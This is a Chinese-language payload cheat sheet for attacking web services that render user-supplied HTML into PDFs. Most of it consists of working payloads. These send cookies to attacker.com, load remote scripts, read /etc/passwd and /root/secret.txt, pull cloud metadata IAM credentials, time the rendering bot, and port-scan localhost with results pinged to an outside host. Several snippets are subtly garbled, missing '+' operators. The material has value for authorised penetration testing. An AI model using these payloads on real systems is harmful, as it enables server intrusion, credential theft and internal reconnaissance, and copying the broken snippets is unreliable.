基本介绍
如果一个网页正在使用用户控制的输入创建一个PDF,您可以尝试欺骗创建PDF的机器人执行任意JS代码,PDF creator bot发现某种HTML标签后它将解释它们,您可以滥用这种行为来导致服务器XSS,需要注意的是<script><script>标记并不总是有效,所以您需要一个不同的方法来执行JS(例如:滥用<img),另外在常规的开发中
在常规开发中将能够看到下载创建的pdf,因此您将能够看到您通过JS编写的所有内容(例如:使用document.write()),如果您看不到创建的PDF您可能需要提取向您发出web请求的信息
常用载荷
Discovy Payload
代码语言:javascript复制<!-- Basic discovery, Write somthing-->
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="' window.location.href '"></iframe>')</script>
<!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c=' document.cookie">
<script>new Image().src="http://attacker.com/?c=" encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">SVG Payload
在这个SVG有效负载中可以使用以下任何先前的有效负载,以一个iframe访问burpcollaborator子域和另一个iframe访问元数据端点为例
代码语言:javascript复制<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>
<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(1);
// ]]>
</script>
</svg>你可以通过访问以下链接获取更多载荷:
https://github.com/allanlw/svg-cheatsheet
Path disclosure
代码语言:javascript复制<!-- If the bot is accessing a file:// path, you will discover the internal path
if not, you will at least have wich path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>Load an external script
代码语言:javascript复制<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>Read local file
代码语言:javascript复制<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script><script>
xhzeem = new XMLHttpRequest();
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
</script><iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>Get external web page response as attachment (metadata endpoints)
代码语言:javascript复制<link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-credentials/">Bot delay
代码语言:javascript复制<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
let time = 500;
setInterval(()=>{
let img = document.createElement("img");
img.src = `https://attacker.com/ping?time=${time}ms`;
time = 500;
}, 500);
</script>
<img src="https://attacker.com/delay">Port Scan
代码语言:javascript复制<!--Scan local port and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
let img = document.createElement("img");
img.src = `http://attacker.com/ping?port=${port}`;
});
}
for(let i=0; i<1000; i ) {
checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">Referer
https://lbherrera.github.io/lab/h1415-ctf-writeup.html
https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/
